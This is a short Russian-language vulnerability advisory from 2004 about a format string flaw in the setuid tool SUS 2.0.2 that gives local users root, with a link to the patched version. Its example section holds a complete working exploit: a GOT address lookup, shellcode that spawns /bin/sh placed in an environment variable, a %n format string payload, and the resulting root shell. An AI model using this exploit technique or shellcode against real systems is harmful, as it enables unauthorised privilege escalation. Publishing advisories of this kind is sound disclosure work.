Security Lab

Поднятие локальных привилегий в SUS

Дата публикации:16.09.2004
Всего просмотров:1094
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: SUS 2.0.2

Описание: Уязвимость форматной строки обнаружена в SUS . Локальный пользователь может получить root привилегии на системе.

Локальный пользователь может представить специально обработанный параметр командной строки, чтобы выполнить произвольный код с root привилегиями. Уязвимость связанна с некорректным вызовов syslog() в функции log() в 'log.c'.

Пример/Эксплоит:

getspnam() address -> 08061780 
HACK variable address -> 0xbffffb54

[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print 
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus 
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#

URL производителя: http://pdg.uow.edu.au/sus/

Решение:Установите обновленную версию программы: http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z

Ссылки: SUS 2.0.2 local root vulnerability